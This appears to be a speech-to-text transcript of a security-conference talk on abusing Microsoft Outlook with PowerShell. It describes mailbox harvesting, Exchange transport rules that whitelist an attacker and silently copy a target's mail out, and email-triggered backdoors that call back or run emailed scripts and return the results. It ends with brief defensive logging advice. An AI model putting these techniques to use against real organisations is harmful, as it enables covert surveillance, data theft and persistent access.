Owning MS Outlook with PowerShell

our our next speaker is Mr Andrew Cole Andrew Cole is going to be talking about owning Outlook using Powershell and he works for a company named Chiron let me tell you a little bit about Chiron if you're unfamiliar with Chiron they are here today they're security training company they they lot training and they have awesome Cas flag upstairs I see a couple of laptops here you got laptop here not plug into that great challenges um and ky's been a great sponsor to u to this event and we are very fortunate um to have them austa and also to have Mr P Cole I seen this guy present conf before and uh I can tell you that each year this has been

one of my favorite talks um has come from him and his group out of at each these conferences so if you would please join me in welcoming Mr thank [Applause] you Mark's so nice all right this is owning Microsoft Outlook with Windows Powershell uh the quick obligatory uh get host so my name is Andrew Cole everybody just calls me Cole always have oh Dam graver's trolling me already okay uh if you want to find me on Twitter if you have any questions afterward you can hit me up at culmination uh so little bit about me and what I do I'm currently a Content developer and an instructor for chiron's information operations team um we teach I teach a

number of classes on computer network exploitation uh using conventional tools and Powershell as well as some MPS and defense classes um in my spare time I do a little dabbling in security research and I mostly just love playing around with Powershell it's fun and exciting um in a prior life I was a journeyman interactive operator for the US Army out of Fort me uh did that for about four years or so and uh spoken at a couple of cons uh here Nola con so on and so forth that's about all that's interesting about me all right first my obligatory thanks I would like to thank bsides for giving me this awesome place to talk at this is

one of the best venues to do a talk at it's just perfect layout and of course my employer for paying me to write this uh I also need to give some credits to some people whose work sort of inspired me to make this talk so uh Ed Wilson that's a Microsoft scripting guy he uh does a lot of stuff and sometimes he says things that I'm like wow I wonder if Microsoft knows that he's publishing that information on their website because some of it's really really interesting things um and uh Matt Nelson he's a really smart guy he wrote a an interesting piece of code that I'll have a link to at the end of this talk that's

sort of led me down this uh General Road for some of the things that we're going to be going over and last of all all the awesome people in the Powell community that have answered my random questions when I hit them up okay so why would you want to do this why do you want to own Powershell or why do you want to own Outlook and why do you want to use Powershell uh big thing is why wouldn't you want to um no matter what sort of network you're doing some red team or penetration testing in odds are good for their uh my messing up your video by walking back and forth okay uh odds are good they use outlook for their

email you know every government uh every government agency uses it um most civilian sectors use it it just it integrates so well with Microsoft's other stuff that pretty much everyone uses it for email um Powershell as long as that hosts as Windows 7 or newer it's going to have Powershell version two on it which is going to give you an incredible amount of functionality if all these things are already there in the environment why would you want to jeopardize your Custom Tool set now if you're doing red teaming and you've managed to develop a custom set it's only a good custom set until it really gets caught and then it's not very useful to you anymore um so if you have

something that's already there on the operating system that you don't have to upload any external binaries for use that first then use your oneoff tool set for when you don't have any other options okay so everything that I'm going to be doing here is based off the the same general con on set we're going to be creating a custom Comm object using Powershell um for the first script I'm going to be just adding the Microsoft interop Assembly that's basically going to serve as in a nutshell it serves as a bridge between net and com um for everything else we're just going to be creating that new custom object for the Outlook application um one of the cool things

about Powershell is because it is objectoriented whenever it grabs something it doesn't if we create this variable here we're not grabbing like a pointer to the object we're grabbing the actual object itself so we have pretty much full hold and control of Outlook and if you think about the things that Outlook does in a network just in its native Behavior Uh you know it receives messages from outside of the network and it's capable of relaying messages back out to that external network so you've got a great sort of command and control system set up there by default all right so the first thing we're going to look at is going to be a little bit

of collection um we can collect pretty much anything that Outlook houses um so it uh Outlook views everything that it has as a folder so it's not just the inbox it's not just the junk folder there's also the calendar the contacts the tasks um I know any environment that I've ever been in for the most part if you go to the commander or CEO's desktop like everything's there but if you want to know what he's doing everything is in his tasks folder right so an Outlook he's got his whole calendar set there with everything he's doing for the next six months and he's got all of his projects and what percentage he's through them all and his task folder so

it's useful stuff to collect all right I should be able to do this can everyone read that or do I need to make it bigger oh wow it's really big up there we're going to say it's good all right so I wh that's the wrong one there we go all right so we're going to start with this collection script um I wrote it with help menus and everything so hopefully if June B sees this she's proud of me and down here so it's a fairly simple script it's called get Outlook it has a couple of parameters set up all the parameters are basically just switches um because it's going to pull in the same manner regardless of what folder

you're going to this is just to designate what folder you're actually going to pull the information from uh by default if you don't tell it to do anything it goes straight to the inbox if you want to pull from a different folder you just need to put the appropriate switch on there to say which folder you want it to harvest information from so this little section pointer is hard to see this section right here is what was on one of the earlier slides we're just grabbing that object that is Outlook I should note that you want to make sure Outlook is running on the host before you do this because if outlook's not already running when you create that com object

for Outlook guess what it's going to do it's going to start Outlook guess where it's going to start it user's desktop so it's going to make the big old popup that says hey here's Outlook so you want to be um wary of where you uh pop it up make sure they already have it open fortunately when most people show up to work what's the first thing you do you log in you open Outlook you check your email and then you minimize it and go on with your day nobody ever closes Outlook and then reopens it later to see if they're gotten a new email so after that we just have a series of switches specifying you know

if you want to get the calendar you just go to the calendar and all the different switches do is specify what folder to go to um so if you pick the calendar switch the folder equals the namespace default folder for calendar um if you choose tasks it switches it to tasks and if it's contacts it makes it contacts um that's all it needs is to know what folder to pull from uh it is then so right here it has if it is the scent folder uh the target folder is then Outlook folder sent mail otherwise default to Outlook folder inbox um there's also a full switch so what you actually see in Outlook for an

email is a very small amount of the information that actually gets transmitted has anyone ever opened up and looked at all the metadata that goes along with an email like there's a lot of stuff in there so if you do put the full switch it's going to grab the full content of every email so I have a little safety catch in there that you know says hey this might be really really large are you sure this is what you want to do and if you say yes then it goes on and runs through and if not then it aborts and falls back if you don't specify the full switch it just goes for a default view

that shows a table that has the subject line um sender uh who it goes to the date time and I believe the body but the body won't contain the whole body unless you expand the property to see it all right so I always pray to the demo Gods before I do a demo even if it's pre-recorded um I was having a slight problem running these demos live on my laptop because once you give four gigs of RAM to your Exchange Server a couple gigs to your DC and a couple to a few workstations there wasn't too much left for my host laptop so it wasn't functioning well so we just played it safe and went with a pre-recorded

videos go on over there we go so what I'm doing here is first I'm importing the module so anytime you have a script in Powershell you have to import the module and load it up before you can execute it once the module's loaded up I'm just going to type get Outlook um by default it again pulls the Inbox and puts it in a little table format so you can see if there's anything in there that is of interest if there's not you could move on um and at this point uh I'm doing a full here so to give you an idea how much stuff is in full that's those same four uh emails set to full output so it's a very large

amount of information it's all the Met metadata associated with the email itself um the rest of them pretty much go along in the same manner so if you specify sent pulls from sent um the contacts I have it pull all the fields by default if they're not populated it'll just leave them blank um but they all pull again in the same manner because Outlook views each of them as a folder not as separate entities all right so moving on from there looking at client side there's a number of things that you can do with uh outlook for client side because one of the number one ways you client side people is you send them spear fishing emails and you

get them to click on the email uh one of the problems you have is sending them an email and not having exchange or Outlook sort of snatch it up and quarantine it so how does the email system how does exchange decide what emails are junk and which are just absolute outright malware well there's something called your spam confidence level so your spam confidence level or has a rating scale of 0 to 9 plus negative 1 negative 1 is assigned to any email that comes from the trusted internal Network so if you have two people that are both logged into the same domain sending an email between each other it's a negative one it automatically goes back and forth no

matter what it's considered safe and trusted um unless there are custom Outlook rules or custom exchange rules that say otherwise other than that it'll be assigned a score of 0o to n zero is extremely trusted it just says okay there's no way this is malware it's just a line of text and it will let it go through depending on what other attributes the email has so if you add an attachment that has any executable functionality that's going to make the jump if you add any links to external sites that makes the jump so depending on how many points each one are allocated based on what's on the email it'll raise that spam confidence level and as it gets higher and higher it will

trip to First the junk setting where it just goes straight to the junk folder not that bad uh if it goes to quarantine quarantine is an optional one it's not there by default in exchange but if the person does add it that's the worst one for us because because it gets sent to the quarantine folder on the exchange server and only an exchange admin has access to that folder to clean it up so you'll have a little issue there um if it gets really bad it would go to reject in which case it won't send the email and it sends a notice to the sender or if it's you know coming from a Nigerian prince who wants to transfer you money

while selling you Viagra on the side it might go ahead and bump all the way to delete and just get wiped out with no notification to anybody so what does this have to do with Outlook technically nothing but this has to do with exchange so I'm going to count it because the two work hand inand so there's a command lit that's built into Powershell but only for Powershell for exchange so you will have to actually get access to the exchange server or if you have the if you get administrator creds you can Powershell remote into the exchange server and you'll have access to this commandlet um what new transport rule does is it lets you make a new transport rule to

designate how mail is handled where it goes to um whatever you want and this can be based on where it comes from the sender it's going to um from I like from address contains words and subject or body contains words so remember those two later on when we start talking about some of the other things we're going to do later but one of the easiest things to do is once you're already in the network you get access to The Exchange Server you want to make sure you're later client sides will work set up sort of a redundancy system we can use this first command so we're going to set a new transport rule we're just going to

name it set you could name it whatever you want to name it so we're going to say anything coming from our attacker email address going to our uh default Target we're just going to set the to minus one so anything that we send no matter what it is I can attach an executable to this file and send it to him and it's going to go directly to his inbox even though coming from malicious. net or wherever it's going to send it right in the other thing you can do that's fun and exciting is this bottom example so we're going to set a new transport rule we're going to call it BCC we're going to say anything that is

sent to our Target person we're just going to automatically blind carb and copy it to ourselves so now every email that person gets is going to get exfilled in the background out to our email address and we don't even have to do anything else we just left these rules in place

all right so now let's talk about the fun stuff let's talk about back doors um every back door has one of two traits right it's either based on having a bind shell or a reverse shell so they both have some flaws or things that can make them rather detectable if you've got a permanently bound socket that's horrible no one should do that anymore hopefully no penetration testers are still at that level that they're leaving a socket bound on the host um it's too easy to find detect and stop beacons harder to fine that's definitely the preferred method the issue that you might have there is even if you add some variants into your callbacks eventually

there's a good chance someone will have a a fine-tuned IDs that's going to catch the traffic going in the wire so Best of Both Worlds gives you a host that has triggerable access you have something that's not necessarily holding a socket open or listening but is waiting for some form of a trigger a prime example this is like a port knock back door you know it's waiting for packets to hit particular packets to hit 445 followed by 135 followed by 139 and if it gets them it'll then have the payload call out that's a a triggerable back door um the benefit of triggerable back doors is again you have no sockets bound whatsoever um there's no unnecessary

Network traffic and uh you have 247 access Outlook is an ideal triggering mechanism if you think about it what's it do it it sits there at all time and waits for traffic to come from wherever and auto forwards it to the host so if you have something in Outlook that's listening for your trigger as soon as the trigger hits it can have your payload call out so this portion I got inspired from Matt Nelson so this is uh he wrote a nice little proof of concept code that did this again the link to it going to be at the end of the presentation um this is only a triggering mechanism you still have to have a persistence method

like anything else it is a Powershell script it has to be started by something so you'll need some persistence method that's going to start it up and you'll need to have some sort of payload that it triggers um for this simple proof of concept code I just had it trigger a calculator because that seems to be the proof of concept goto if you can pop a calculator you can pop a shell um so what the process is here uh it's going to monitor the inbox for the trigger email when the trigger's detected it's going to start the payload and have something call back out um Matt Nelson's did this the only things I did really that I tweaked on it

a little bit is his deleted the email I wanted to mark it as unread first and then after I delete it I also wanted to remove it from the deleted items folder so it's not still just sitting there um after that it goes and sleeps for a designated interval and waits for another trigger

packet everything's easy to see except for the cursor there it is maybe there we go all right

all right so for this trigger to work we have to have a certain set of parameters that are defined um obviously you have to have the delay for how long you wanted to sleep the payload for what you want it to actually trigger um again in this case I'm going to set it to a calculator and then for this basic one it's just looking for the sender's email address and then the subject line so if it receiv receives an email from the designated sending address and has the designated subject line it's going to go into its other uh instructions and execute the payload and then it'll sleep for a delay if it gets any email that

doesn't meet both those criteria it's going to just go about its business go through a sleep and then come back to another cycle uh there is also a switch if you want to monitor the junk folder instead of monitoring the inbox that's fine and dandy too um people tend to pay as much attention to things that go to the junk folder so maybe you wanted to put a transport rule in that set the to two so that your email automatically went to junk in which case you would set your folder your monitoring to junk so in this beginning section here we're just defining which folder we're going to look at uh the junk folder is folder

number 23 the Outlook folder for the inbox is folder number six I don't know what all the other folder numbers are because they have a lot more folder numbers than they have actual folders I guess they left some blank space in there in case they needed it for some future use so then we've got this process that starts and it's going to start the Outlook again and get that com object and then we're defining the folder to be whichever folder was specified in the earlier section after that it's going to Define a variable called emails that is everything that's in that folder and then for those emails you didn't see that for those emails there's this little if statement

that says if the sender address matches sent mail and if the subject matches the trigger subject then it will go into this Behavior so the first thing it does is marks the unread to false so that's going to make it not show up as a new email it's going to make it sort of go away uh not go away but it's going to Market is red after that it's going to uh delete the email so it gets moved to the deleted items folder and isn't sitting in the inbox anymore and it's then going to set this variable of cleaned to false so I used to have it just run through and automatically clean up after it ran

through the trigger but then I'm scanning two uh two different folders and it was doubling the resources necessary for the script so now I just set a variable once it finds the trigger email and deletes it sets the variable to false so that excuse me so that it knows it has to clean up so then if cleaned is equal false it will go through these clean up steps so the first thing it does is it grabs the deleted item folder and then it defines the emails as everything that it's in the deleted items folder and then it looks for that same email and when it finds it it'll delete it from the deleted items and then set the clean

variable to true so in the next cycle through it won't attempt to clean up unless it receives another trigger uh after that it will start the sleep cycle and I missed the part where it's calling the

[Music] payload yep it's right here okay I knew I skipped it so yeah in the middle of that right before it deleted the email was start process payload so whatever you had set as your process now it wouldn't have to be an executable file instead of using start process here you could use invoke expression and have it run a blob of uh a script instead you could do whatever you really wanted it to be whatever you wanted to set your payload to so after it goes through that and after it cleans up it then just sleeps for it delay and after it finishes it sleep it goes back to monitoring the inbox again

okay so again it's going to import the module so it'll load up I already have the email prepped but I have it sitting in the junk folder so I also have uh if anyone's not familiar with Powershell all those lines that say write verbose that are in the script those aren't going to do anything unless the script is started with the uh Tac forbose switch in which case it will give you extra information so once I start the uh trigger mechanism is going you're going to see it uh write the Rev boast line saying it's checking the inbox email not found and then sleeping and going through the cycle and then as soon as I

move the junk email folder from the junk folder to the inbox you'll see it then trigger on the email and run through the rest of it steps and describe what it's doing as it goes video is moving right there we go okay so there's the verbose lines it's going through its sleep cycle it's not finding an email and it's moving on because there's no uh email that matches the trigger in the inbox so now I'm going to go to the junk email there is the email that matches the sender and the subject line so it's in the folder and you can see it just caught it triggered and started a calculator for us

[Applause] yay all right that's a fun happy Act of crowd all right so what's the one big problem with using email as a triggering mechanism what happens when you get an email you open it how do you know that you have one yeah it makes a popup right you get this little thing that looks a lot like that that shows up so what happens if you periodically get a popup and then you go to the folder and the email's gone you might just scratch your head think it's a glitch the first time but about the third or fourth time you have this magical email that keeps popping up from the same sender and then magically

disappearing you might start to call your it guy and be like I think I'm owned um or you're just not very cyber smart and you might just roll with it for the rest of your life I don't know but we're going to give people the benefit of the doubt and assume at some point they would make a jump so the issue that you have there is well you still have to send the email for the trigger to work but that deleting the email afterwards is going to sort of get you caught eventually so I had a co-worker who said could you make that Dynamic and I thought huh yeah I bet you could thank you flip and uh so I wrote a

script to run more dynamically so it doesn't have to come from a specific uh IP address or email address it doesn't have to have a set trigger line it can be any email that matches certain trigger criteria um so who here has a LinkedIn account all right so then having that LinkedIn account who at least once every two weeks gets some spam email for some recruiter that scraped you off of your LinkedIn account yeah it's annoying as hell do you even pay attention attention to them or do you just leave them there and move them to your junk folder or delete them yeah I I don't even read mine most of the time anymore I just delete them

and move on so that's the premise we're going to work with we're going to filter on the body of the email instead of the sender address or the uh subject line what we're going to do is we're going to have it look for a series of trigger words somewhere in the body of the email so these would have to be three words that are common enough that it wouldn't seem really strange you know you can't have Superfluous and super califragilistic Expialidocious and crap like that altogether because people are going to notice those words recurring over and over again um but on the other hand it has to be specific enough that it's unlikely that a false trigger will get

sent we don't want an actual email from a real person to trigger our payload either so we need to find the three trigger words in the email additionally we have to find a single number the email can't have more than one number in it has to have a single number that falls within the port range so it has to be between one and 65,535 it also has to have a URL that URL will be resolved to an IP address that will then be used for the call back so this way you can send your email from any email address you want with any subject line in the body it just has to contain three words a URL

that can trans to the IP you want it to call back to and a single number that is the port you want it to call back to this way when you put your payload on target you can do a number of things you can make a if you're a big metas sploit friend and there's no antivirus in the network you can make a default interpreter payload that just doesn't have a statically assigned callback that has a dynamic one so you can provide parameters and have that call back or you can just have a little blob a poers shell that opens up a socket and calls back whatever suits your fancy that wasn't supposed to happen yet pay

no mind to the turtle he's not really there all

right okay so the parameters that you would have to specify here and I put a little bit of parameter control on here to make sure you give valid ones so the first one is you need your trigger words and I'm using validate count there to make sure you gave exactly three trigger words because if you give less than that the script will probably freak out and not be happy um we have a delay of course this is still monitoring an inbox so you have to set a delay and when you're setting the delay you need to find a balance if you set it to Too Short it's going to start really burning Ram because it's just constantly

scanning the inbox over and over again if you set it to a long delay you're going to be waiting a while for it to scan find your email and Trigger your call back so if your email gets deleted before it finds it you won't get your call back so you need to find a middle ground there then you have to specify a payload so what you want it to actually trigger and again it'll scan the inbox by default or if you tell it to move to the junk folder it'll go to the junk folder instead uh the rest of this should look very familiar it's uh selecting the junk folder of the inbox or hook and Outlook

the same way we did every time and then for each email if the body matches the trigger word zero trigger words one and Trigger words two because our trigger words are just saved as a string array so as long as it finds all three of them it will then grab the body of the email and it's going to load it up in a variable and then we have two uh other variables I've defined here one is the Rex for a URL and another is the Rex for every possible Port range I really suck at Rex so I need to thank my co-workers again for writing my Rex for me it is not my forte at all that was

Jared after that for each section in the uh so the formatted is just the body of the email split on every space so it's grabbing each word or each section between spaces and calling it a section and then it's then checking each one of those and if it matches the URL Rex it's going to grab it and acknowledge that that is what it's going to have to use as its callback address if it matches the port Rex it's going to set that as the port so down here we're going to set lookup to uh use the net accelerator uh system. net. DNS to get the host entry for that URL um and we've just got a catch

statement there for if it goes F Bar on us and then we're doing the net IP address for the IP equals lookup for that address and then set the address to a string so I don't have an actual payload for the demo here instead I'm having it resolve our uh our corporate email for the IP address and then it's just going to pop a text document that says the IP address I would call back to is this IP the port I would call back to is export come back all right

I'm doing good for time all right so again we're going to import the module first uh we're setting it to go in the trigger words I think what I picked were uh LinkedIn independent and cyber tax security figured those are all words that won't pop as like nasty buzzword but they're also things that are unlikely to show up in an email by themselves cuz who hyper hyphenates cyber security um or even uses the term term as much anymore so this is my email I saw your profile in LinkedIn I'm an independent contractor yada y yada uh do uh cyber security you can reach me at chyon tech.com and then I found a street address is a great place to squeeze in a

port number because street addresses do not generally have more than five digits to them and ports also do not have more than five digits to them so it's a great place to put your port number so it's again it's looking for the email it's running it's not finding any because again it's in the junk email folder right now and not in the folder that uh it's monitoring so it's just going to go through and sleep and try to find things because nothing in the inbox matches so we're going to take our junk email and we are going to move it to our inbox and it should find it in just a second so it said hey I found Chiron

Tech and it popped open a notep so it will call back to that IP address on Port 2700 and I think I have an NS lookup for our corporate IP address going that'll show that the port or rather the IP address is the same so that way it can call back to whatever you want and you don't have to use the same callback IPS or emails each time you set things up um let me minimize that too so that's awesome triggering back doors is great um anyone tell me what is better than triggering a back door what if you don't even have to get on the box to begin with I mean at the end of the day automation makes your

life so much easier so what if you could have something that monitors Outlook and instead of having a call back that's going to trigger a payload and call you back what if it's a what if the task you need to do is a smaller easier one say uh it is that CEO and you know everything of value is on his desktop so maybe you just want to get the contents of that desktop and pull it back on a recurring basis well we can use uh Outlook to get our information for us and be our Command and control mechanism for our automation script without having to get a shell on the Target and if you think about it it's

designed to receive emails it'll then take the instructions we give us do our collection attach it to another email and xfill the information right back out to us using the same email system okay the problem with this is is you can't just send a PS1 script to Outlook it is not going to work anything with the PS1 extension is instantly recognized as executable code and at a minimum it's going to go to the junk folder and have the code disabled uh depending on how the exchange rules are set up it can quarantine or reject your email so that LE leaves us two possible options we can either put our script literally in the body of the email or we

can just attach it as a.txt file um Outlook and exchange consider text files to be completely harmless and benign they don't even monitor for them they just let them right through so you could have done either method I opted to just go for the attachment so I'm just going to put the commands I want into a text file and attach them to the email okay so it's a fairly fairly simple process um this could be streamlined and I plan to streamline a little more in a uh later evolution of this but I just haven't gotten to it yet so it's going to monitor the inbox or junk folder whatever you tell it once it detects the

email it's going to and again this is Dynamics so it's looking for three trigger words in the email body and then once it finds it it's going to take the attachment and it's going to save the attachment to disk uh in the temp folder um once it saves it it's going to grab its contents uh save them as a variable and then delete that temporary file it's going to take that variable which contains your script it's going to execute whatever instructions were inside of it and after it executes it's going to write the results out to another temporary file on the dis which it will then attach as an attachment to an email that will go back to whatever

email address sent the script in in the first place uh afterwards it'll go through the the standard cleanup procedures it'll blow away that second temp file it will delete both the trigger and xfill emails from the Inbox and the send items folder and then it'll clean up the deleted items folder how am I doing on time I need to go a little faster okay so it functions in a similar manner to the others so I'm just going to all it needs for parameters is the delay and the trigger words uh that's setting the folder again I'm going to skip down to the part that is new so for a place to save to dis I just

went ahead and saved to the temp folder and for the names for the temporary files I went with Tilda DF some numbers because that's always there anyways it's how Windows saves temp files there to begin with so we'll just throw a couple extras in there they're not going to be there long enough for anyone to notice and no AV is going to be looking for malicious txt files because they're non-executable so it's going to save it to disk afterwards it's going to create a new outlook item we're just setting a subject the body redefining the two address as the attacker email from the trigger email and attaching the text file and then sending it afterwards it

goes through cleanup which basically matches all the others um on this last video you're going to notice things are a little bit different uh there's going to be some popups and I will explain what the popup are afterwards all right so there there are going to be two popups one is going to be when we start trying to grab emails from the inbox you're going to see a popup from Outlook saying hey somebody's doing something bad do you want to let them do this also when we try to send an email it's going to make another pop up that says hey somebody's doing something bad are you sure you want to let them do this so I'll I'll get into how we get

around those uh later well momentarily because I'm running out of time okay so this one has I made a much simpler email uh but it's got the three trigger words and it has a text document it and the text document has one command which is just get process so all it's going to do is grab a process list and send the email back out in the script I commented out the part where it cleans up the emails because I need to have the sent email there to show that it actually worked if it deleted it I'd just be like it did it I promise so it's going to run through I have it loaded up with the three trigger words

uh kitty dog and cheeky uh it's searching and when I move the email to the inbox it should now momentarily there's the popup it says Hey somebody just tried to grab this email and do something are you sure you want to allow this so I said yes allow it it's then going to run the command and it's there's another one that says hey a program is trying to send an email in your name are you sure you want to allow this I went ahead and said yes so it's sent so it sent the item the verose says that it was cleaning up but it didn't actually clean up and if we look at the send items folder there will be an email

on there to our attacker with a attachment that should have the process list Tada all right so I think it's kind of sh minimize I think it's kind of shady to give a talk talking about nasty stuff you can do without giving a quick preview of how you can actually do some defense to this so how can you stop these things from happening how can you protect yourself um oh I skipped a slide this is just what I'd like to do in the future obviously I'd want to add encryption but I'm I'm smart enough about encryption to know that I'm not smart enough to roll my own so I would have someone else roll my crypto for me uh and I would like to

merge it all into one tool so you could sort of do it as an all-in-one and not have four separate scripts so how do you protect yourself for starters you can go ahead and get rid of your AV product um this is a horrible idea to do in general but the reason we didn't get popups in the first three um videos and we did in the fourth the fourth one uh did not have an antivirus product yeah did not have an antivirus product on it so once an antivirus product registers Outlook says oh there's an AV I don't have to protect myself anymore the AV product is going to do it for me so those popups that you

saw on the fourth video was Outlook defending itself but if you have an AV product thank you of asked you did a great job um Outlook assumes that everything's fine and that the AV product will take care of it so it didn't so I guess you just need to have a better uh antivirus product than a vas free version maybe a vas paid version we'll check email and monitor um but it does make Outlook disable its own defenses other things you can do I mean stopping it from happening is difficult unless you know you're monitoring your exchange server but I mean event logs assume breach and just monitor your event logs um starting with uh Colonel

61 so Windows if you have that particular hot fix attached in addition to auditing process creation you can also include the command line in the event log so if you have the command line it's going to have when the Powershell process starts it's going to have that it's starting a script and where it's loading that script from look at that um Powershell logging if you're on a system that has Powershell you have a Powershell log turn it on and set the settings um if you have Powershell version 4 or newer uh there's a feature called Powershell transcription so you can just type start transcript and it will record every command and everything that those commands return that happens

in a Powershell session there's also a setting you can turn on that has mandatory Powershell conscript ah transcription so anytime that Powershell pops on the host it's going to run and everything that got typed and written gets written to disk but it doesn't alert the user that it's doing it the user in this case being the attacker these are my shoutouts so for the scraping Outlook I got the idea from a Ed Wilson's thing on um exporting your Outlook calendar and for the triggers I got the initial idea from again Matt Nelson's blog uh it is very good I would recommend you read it if you uh have copia spare time um if you want any of

these code samples they are all up on GitHub feel free to grab them modify them do what suits your fancy just please if you use them irresponsibly you didn't get them from me and that's all I have does anybody have any questions yes you are aware that you can do do visible after Outlook when you create the Comm object to make it disappear so the user hadn't actually loaded it already you could load it make it disappear or not be visible for more than half a second or so and then do everything you need to do so it could be done before hours or after hours and the US are gone no I did not actually know that W I

learned something today this was a really good talk I learned something thank you I'll have to talk to you afterwards uh any other questions fer yes um you mentioned earlier encryption so something separate from that would you be able to use tonography and just say um and then so you want to for which aspects so you want to store the scripts that I had that are running or the one for the command and control that it runs when when you're sending the user when you send the user a password script inside that textb okay kind of obvious they can open it up and see it even if it's if you were to hide that inside an image

using would that be a successful way of you know keeping it lowy you could hide it in an image uh I do not have a strong background in stego um theoretically yeah you probably just made your script a lot longer but um I don't see a reason why you wouldn't be able to anybody else yes

yes um so the execution policy it's a it's a good thing um Microsoft is very careful to call that a uh safety feature not a security feature so the difference would be um your seat belt is a safety feature it will not stop you from running your car into a tree um the execution policy is a good catch but there's so many ways to bypass that that I mean it's it's ridiculous there's web pages called 15 ways to bypass the script execution policy in Powershell it's pretty much Child's Play to step around

it just in case set oh yeah if I was going to deploy It Whatever actually started up The Script I would run that with a a bypass to get past the execution policy yep all right I'm I am just about out of time um